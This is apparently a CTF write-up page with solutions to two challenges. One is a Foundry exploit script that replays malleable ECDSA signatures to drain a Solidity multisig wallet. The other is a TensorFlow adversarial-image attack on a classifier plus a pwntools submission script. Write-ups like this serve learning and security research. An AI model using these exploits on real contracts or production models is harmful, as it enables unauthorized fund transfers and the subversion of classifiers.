Misc
tbd by anywheres (i think)
sky
tbd by anywheres / shubuntu (i think)
cowsay
tbd by anywheres (i think)
TI-1983
tbd by anywheres (i think)
multisig-wallet
This multisig wallet lets the owners distribute a shared fund of tokens. Distribute all the tokens in the wallet without the controllers' permission. Do note: the RPC URL says 0.0.0.0:8545 on the API; it is actually the second URL we gave you for your instance.
Ok, so we are provided two smart contracts: Locker.sol and Setup.sol. Setup.sol has super basic stuff, so we can basically ignore it until we write our exploit contract. Let's look into Locker.sol.
The Locker contract defines a constructor, which receives the lock id, 3 signatures (v, r, s), 3 controller addresses, and a threshold. The constructor checks that we have at least as many controllers as the threshold (3 here), computes the expected message hash for lockId 0, then calls validateMultiSig().
constructor(
    uint256 _lockId,
    signature[] memory signatures,
    address[] memory _controllers,
    uint256 _threshold
) {
    require(
        _controllers.length >= _threshold && _threshold > 0,
        "Invalid config"
    );

    lockId = _lockId;
    threshold = _threshold;
    controllers = _controllers;
    tokens = 1;

    // Compute the expected hash
    bytes32 _msgHash;
    assembly {
        mstore(0x00, "\x19Ethereum Signed Message:\n32") // 28 bytes
        mstore(0x1C, _lockId)
        _msgHash := keccak256(0x00, 0x3c)
    }
    msgHash = _msgHash;

    validateMultiSig(signatures);
}
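The assembly block is just the standard "\x19Ethereum Signed Message:\n32" prefix hashed together with the 32-byte lockId. As a sanity check, here's the same computation in Python (my own sketch, not from the challenge files; it assumes you have the eth_utils package):

from eth_utils import keccak

def expected_msg_hash(lock_id: int) -> bytes:
    # 28-byte EIP-191 prefix followed by the 32-byte big-endian lockId;
    # keccak256 over 28 + 32 = 60 (0x3c) bytes, matching the assembly above
    prefix = b"\x19Ethereum Signed Message:\n32"
    return keccak(prefix + lock_id.to_bytes(32, "big"))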
validateMultiSig() uses _isValidSignature() to recover the signer address with ecrecover(msgHash, v, r, s), check that the signer is in the controllers list, and compute a signature hash with keccak256(abi.encode([uint256(r), uint256(s), uint256(v)])). It then marks that hash as used, so the exact same signature can never be submitted twice.
function _isValidSignature(
    signature memory sig
) internal returns (address) {
    uint8 v = sig.v;
    bytes32 r = sig.r;
    bytes32 s = sig.s;
    address _address = ecrecover(msgHash, v, r, s);
    require(_isInArray(_address, controllers), "Signer is not a controller");

    bytes32 signatureHash = keccak256(
        abi.encode([uint256(r), uint256(s), uint256(v)])
    );
    require(!usedSignatures[signatureHash], "Signature has already been used");
    usedSignatures[signatureHash] = true;
    return _address;
}
This is further enforced in validateMultiSig(), which ensures there are no duplicate signers and that there are exactly 3 valid signatures.
The Locker.sol file also contains a SetupLocker contract, which we can set aside for now.
The isSolved() function tells us exactly what we need to do to solve the challenge: get the number of tokens to zero.
function isSolved() external view returns (bool) {
    return tokens == 0;
}
There is a distribute() function, which lets us subtract 1 from tokens if the provided signatures pass validateMultiSig().
Looking at the constructor again, we know that tokens = 1, so we need to call distribute() with valid signatures in order to reach the win condition of tokens = 0. So how do we do that? The constructor's signatures are already marked as used, so we can't use those again...
The vulnerability is that the signature hash calculation keccak256(abi.encode([uint256(r), uint256(s), uint256(v)])) creates a unique identifier for each signature, but ECDSA signatures can have two valid representations for the same signer and message. I'm not really a crypto person, but TLDR: for any valid signature (r, s), there exists a second valid signature (r, s') where s' = n - s and n is the curve order.

Original:  (v=27, r, s)     uses point (r, y)
Malleable: (v=28, r, n - s) uses point (r, -y)
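To make that concrete, here's a tiny Python sketch (my own illustration, not part of the challenge files) of how one valid signature is flipped into its malleable twin:

# secp256k1 curve order (the same n the exploit script below uses)
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141

def malleate(v: int, r: int, s: int) -> tuple[int, int, int]:
    """Given one valid (v, r, s), return the other valid encoding.

    ecrecover() accepts both encodings, but keccak256(abi.encode([r, s, v]))
    hashes them to two different 'used signature' identifiers.
    """
    assert v in (27, 28)
    return (55 - v, r, N - s)  # 55 - 27 = 28 and 55 - 28 = 27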
So if we just calculate the other valid point, the signature will pass validation even though it technically is a different signature! Let's create Exploit.s.sol. I set this up in Foundry, so you may want to learn how to set up Foundry or use a different web3 setup.
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import {Script, console} from "forge-std/Script.sol";
import {Locker, signature} from "../src/Locker.sol";
import {Setup} from "../src/Setup.sol";

contract Exploit is Script {
    uint256 privateKey = vm.envUint("PRIVATE_KEY");
    // replace with the actual deployed contract address
    Locker locker = Locker(<CONTRACT ADDRESS HERE>);

    function run() public {
        vm.startBroadcast();

        console.log("Starting exploit...");
        console.log("Current tokens:", locker.tokens());

        uint256 n = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141; // secp256k1 curve order

        signature[] memory malleableSignatures = new signature[](3);

        malleableSignatures[0] = signature({
            v: 28,
            r: 0x36ade3c84a9768d762f611fbba09f0f678c55cd73a734b330a9602b7426b18d9,
            s: bytes32(n - uint256(0x6f326347e65ae8b25830beee7f3a4374f535a8f6eedb5221efba0f17eceea9a9))
        });
        malleableSignatures[1] = signature({
            v: 27,
            r: 0x57f4f9e4f2ef7280c23b31c0360384113bc7aa130073c43bb8ff83d4804bd2a7,
            s: bytes32(n - uint256(0x694430205a6b625cc8506e945208ad32bec94583bf4ec116598708f3b65e4910))
        });
        malleableSignatures[2] = signature({
            v: 28,
            r: 0xe2e9d4367932529bf0c5c814942d2ff9ae3b5270a240be64b89f839cd4c78d5d,
            s: bytes32(n - uint256(0x6c0c845b7a88f5a2396d7f75b536ad577bbdb27ea8c03769a958b2a9d67117d2))
        });

        console.log("Calling distribute with malleable signatures...");
        locker.distribute(malleableSignatures);

        console.log("Tokens after exploit:", locker.tokens());
        console.log("Is solved:", locker.isSolved());

        vm.stopBroadcast();
    }
}
We then do:
forge script script/Exploit.s.sol --rpc-url https://misc-multisig-wallet-1y2sewxq.smiley.cat --broadcast --chain-id 31337 --legacy --private-key <YOUR PRIVATE KEY HERE>
== Logs ==
  Starting exploit...
  Current tokens: 1
  Calling distribute with malleable signatures...
  Tokens after exploit: 0
  Is solved: true
You should see in the output that we have successfully solved the challenge, after which the transactions are broadcast.
Then on the blockchain "info" site, simply press "get flag" and you will get the flag: .;,;.{sig_replay_kills_multisig}
This was the first ever blockchain challenge I solved in a CTF! I had only ever done Ethernaut before (+ a Claude crutch on this one), but it was pretty cool trying to understand how this worked. Btw pls don't ask me questions abt this chall, it's legit blind leading the blind lmao.
Project Holoswap
After their graduation, .;,;. sealed away the souls of Gura and Amelia in an archive AI. Now, a glitch gives you one chance to spoof the system.
"a… that's kinda sus…"
A pure Claude endeavor. The solve script is rly long cus of Claude (just write simple scripts bro).
import base64
import io
import numpy as np
import os

# Suppress TensorFlow warnings
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
tf.get_logger().setLevel('ERROR')

from PIL import Image
from tensorflow.keras.preprocessing.image import img_to_array

def load_verified_model():
    """Load the verified working model"""
    model = tf.keras.models.load_model('./verified_model.h5')
    return model

def load_image(img_path_or_pil):
    """Load and preprocess image EXACTLY like the server does"""
    if isinstance(img_path_or_pil, str):
        img = Image.open(img_path_or_pil)
    else:
        img = img_path_or_pil

    if img.mode == 'RGBA':
        img = img.convert('RGB')
    img = img_to_array(img.resize((96, 96)))
    img = img.astype('float32') / 255.0
    img = np.expand_dims(img, axis=0)
    return img

def calculate_l2_norm(image1, image2):
    """Calculate L2 norm EXACTLY like the server does"""
    return np.linalg.norm(image1.squeeze() - image2.squeeze())

def ultra_precise_attack(model, original_image, target_class=9):
    """
    Ultra-precise attack targeting L2 < 0.85 for safety margin
    """
    print("\n[*] Ultra-Precise L2 Constrained Attack")
    print("Target: >99.9% confidence, L2 < 0.85 (safety margin)")

    # Multiple attempts with different parameters
    best_result = None
    best_score = 0.0

    configs = [
        # (learning_rate, l2_target, iterations, confidence_weight)
        (0.01, 0.80, 2000, 10.0),
        (0.005, 0.75, 2500, 15.0),
        (0.02, 0.82, 1500, 8.0),
        (0.008, 0.78, 3000, 12.0),
    ]

    for config_idx, (lr, l2_target, max_iter, conf_weight) in enumerate(configs):
        print(f"\n--- Config {config_idx+1}: LR={lr}, L2_target={l2_target}, Iter={max_iter} ---")

        adv_image = tf.Variable(original_image.copy(), dtype=tf.float32)

        # Warmup phase: build confidence
        print("Warmup phase...")
        for i in range(300):
            with tf.GradientTape() as tape:
                prediction = model(adv_image, training=False)
                target_prob = prediction[0][target_class]
                loss = -tf.math.log(target_prob + 1e-10)

            gradients = tape.gradient(loss, adv_image)
            if gradients is not None:
                adv_image.assign_sub(lr * 2.0 * gradients)
                adv_image.assign(tf.clip_by_value(adv_image, 0.0, 1.0))

        # Main optimization with strict L2 control
        print("Main optimization...")
        current_lr = lr

        for i in range(max_iter):
            with tf.GradientTape() as tape:
                prediction = model(adv_image, training=False)
                target_prob = prediction[0][target_class]

                # Confidence loss
                conf_loss = -tf.math.log(target_prob + 1e-12)

                # L2 penalty with steep increase near target
                current_l2 = tf.sqrt(tf.reduce_sum(tf.square(adv_image - original_image)))
                l2_excess = tf.maximum(0.0, current_l2 - l2_target)
                l2_penalty = tf.square(l2_excess) * (10.0 + i * 0.01)  # Increasing penalty

                # Combined loss
                loss = conf_loss * conf_weight + l2_penalty

            gradients = tape.gradient(loss, adv_image)

            if gradients is not None:
                # Adaptive learning rate
                if i % 200 == 0 and i > 0:
                    current_lr *= 0.95

                adv_image.assign_sub(current_lr * gradients)
                adv_image.assign(tf.clip_by_value(adv_image, 0.0, 1.0))

            # Progress check
            if i % 500 == 0:
                pred = model(adv_image, training=False).numpy()
                pred_class = np.argmax(pred)
                confidence = pred[0][target_class]
                l2_dist = calculate_l2_norm(adv_image.numpy(), original_image)

                print(f"  Iter {i}: Class={pred_class}, Conf={confidence:.6f}, L2={l2_dist:.4f}")

                # Early success check
                if pred_class == target_class and confidence > 0.999 and l2_dist < 0.85:
                    print(f"  [+] Early success at iter {i}!")
                    break

        # Final evaluation for this config
        pred = model(adv_image, training=False).numpy()
        pred_class = np.argmax(pred)
        confidence = pred[0][target_class]
        l2_dist = calculate_l2_norm(adv_image.numpy(), original_image)

        print(f"Config {config_idx+1} final: Class={pred_class}, Conf={confidence:.6f}, L2={l2_dist:.4f}")

        # Scoring: heavily penalize L2 > 0.85, reward high confidence
        if pred_class == target_class and l2_dist < 0.85:
            score = confidence
        else:
            score = 0.0

        if score > best_score:
            best_score = score
            best_result = adv_image.numpy().copy()
            print(f"  [+] New best! Score={score:.6f}")

    return best_result

def precision_fine_tune(model, initial_image, original_image, target_class=9):
    """
    Fine-tune to maximize precision within L2 constraint
    """
    print("\n[*] Precision Fine-Tuning")

    adv_image = tf.Variable(initial_image.copy(), dtype=tf.float32)

    # Very conservative fine-tuning
    for i in range(1000):
        with tf.GradientTape() as tape:
            prediction = model(adv_image, training=False)
            target_prob = prediction[0][target_class]

            current_l2 = tf.sqrt(tf.reduce_sum(tf.square(adv_image - original_image)))

            # Only optimize confidence if L2 is safely below 0.8
            if current_l2 < 0.8:
                loss = -tf.math.log(target_prob + 1e-12)
            else:
                # Focus on reducing L2
                loss = tf.square(current_l2 - 0.75) * 100.0

        gradients = tape.gradient(loss, adv_image)

        if gradients is not None:
            # Very small learning rate for precision
            adv_image.assign_sub(0.001 * gradients)
            adv_image.assign(tf.clip_by_value(adv_image, 0.0, 1.0))

        if i % 200 == 0:
            pred = model(adv_image, training=False).numpy()
            pred_class = np.argmax(pred)
            confidence = pred[0][target_class]
            l2_dist = calculate_l2_norm(adv_image.numpy(), original_image)

            print(f"  Fine-tune {i}: Class={pred_class}, Conf={confidence:.6f}, L2={l2_dist:.4f}")

    return adv_image.numpy()

def server_simulation_test(adversarial_image, model, original_image):
    """Test with multiple server simulation variations"""
    print("\n[*] Comprehensive Server Simulation")

    # Test 1: Direct numpy
    pred = model.predict(adversarial_image, verbose=0)
    pred_class = np.argmax(pred)
    confidence = pred[0][9]
    l2_dist = calculate_l2_norm(adversarial_image, original_image)

    print(f"Test 1 (Direct): Class={pred_class}, Conf={confidence:.6f}, L2={l2_dist:.6f}")

    # Test 2: PNG conversion (exact server path)
    img_array = (adversarial_image.squeeze() * 255).astype(np.uint8)
    pil_img = Image.fromarray(img_array)

    buffer = io.BytesIO()
    pil_img.save(buffer, format='PNG')
    base64_string = base64.b64encode(buffer.getvalue()).decode()

    # Reload exactly like server
    server_image = load_image(Image.open(io.BytesIO(base64.b64decode(base64_string))))
    server_pred = model.predict(server_image, verbose=0)
    server_class = np.argmax(server_pred)
    server_conf = server_pred[0][9]
    server_l2 = calculate_l2_norm(server_image, original_image)

    print(f"Test 2 (Server): Class={server_class}, Conf={server_conf:.6f}, L2={server_l2:.6f}")

    # Test 3: Different precision modes
    server_image_float64 = server_image.astype(np.float64)
    original_image_float64 = original_image.astype(np.float64)
    l2_float64 = np.linalg.norm(server_image_float64.squeeze() - original_image_float64.squeeze())

    print(f"Test 3 (Float64): L2={l2_float64:.6f}")

    # Success check with safety margin
    success = (server_class == 9 and server_conf > 0.999 and server_l2 < 0.9)

    if success:
        print("\n[+] SERVER SIMULATION SUCCESS!")
        print(f"{'='*80}")
        print("SUBMIT THIS BASE64 STRING TO THE SERVER:")
        print(f"{'='*80}")
        print(base64_string)
        print(f"{'='*80}")

        with open('ULTRA_PRECISE_SOLUTION.txt', 'w') as f:
            f.write(base64_string)
        print("Solution saved to 'ULTRA_PRECISE_SOLUTION.txt'")

        return True, base64_string
    else:
        print("\n[-] Server simulation failed")
        print("Required: Class=9, Conf>0.999, L2<0.9")
        print(f"Achieved: Class={server_class}, Conf={server_conf:.6f}, L2={server_l2:.6f}")
        return False, base64_string

def main():
    print("[*] ULTRA-PRECISE CTF SOLVER [*]")
    print("="*50)

    # Load everything
    model = load_verified_model()
    original_image = load_image('./gura.png')

    # Verify original prediction
    orig_pred = model.predict(original_image, verbose=0)
    orig_class = np.argmax(orig_pred)
    print(f"Original prediction: Class {orig_class} (expected: 5)")

    if orig_class != 5:
        print("[-] Original prediction mismatch!")
        return

    # Ultra-precise attack
    result = ultra_precise_attack(model, original_image)

    if result is not None:
        # Fine-tune for maximum precision
        fine_tuned = precision_fine_tune(model, result, original_image)

        # Comprehensive server simulation
        success, base64_string = server_simulation_test(fine_tuned, model, original_image)

        if success:
            print("\n[+] ULTRA-PRECISE SUCCESS!")
            return
        else:
            print("\n[*] Trying original result without fine-tuning...")
            success, base64_string = server_simulation_test(result, model, original_image)

            if success:
                print("\n[+] SUCCESS WITH ORIGINAL RESULT!")
                return

    print("\n[-] ULTRA-PRECISE ATTACK FAILED")
    print("The L2 constraint may be too restrictive for this model architecture.")

if __name__ == "__main__":
    main()
I'm not an AI/ML person, nor do I really care abt it, so I'll just leave it for you to analyze. I think it just runs gradient-based optimization until it fulfills the requirements. Eventually, after some time, you get an image that passes the server's constraints, and you can submit it.
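For what it's worth, the whole thing boils down to a short targeted gradient-descent loop. Here's a minimal sketch of the core idea (my own distillation, reusing the model/image setup from the script above; the thresholds are assumptions, not exact values from the server):

import numpy as np
import tensorflow as tf

def simple_attack(model, original, target_class=9, l2_budget=0.85,
                  steps=2000, lr=0.01):
    """Nudge the image toward target_class while penalizing L2 drift."""
    adv = tf.Variable(original.copy(), dtype=tf.float32)
    for _ in range(steps):
        with tf.GradientTape() as tape:
            prob = model(adv, training=False)[0][target_class]
            l2 = tf.sqrt(tf.reduce_sum(tf.square(adv - original)))
            # maximize target confidence; punish exceeding the L2 budget
            loss = (-tf.math.log(prob + 1e-12)
                    + 100.0 * tf.square(tf.maximum(0.0, l2 - l2_budget)))
        adv.assign_sub(lr * tape.gradient(loss, adv))
        adv.assign(tf.clip_by_value(adv, 0.0, 1.0))
    return adv.numpy()

Submission itself is just a quick pwntools script: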
from pwn import *
r = remote('smiley.cat',40353)
b64 = open('ULTRA_PRECISE_SOLUTION.txt').read().encode()
r.sendlineafter(b"Enter the base64 encoded image data:", b64)
print(r.recv())
r.interactive()
.;,;.{Graduation_is_not_the_end_samekosaba_:eyes:}
offset
tbd by anywheres (i think)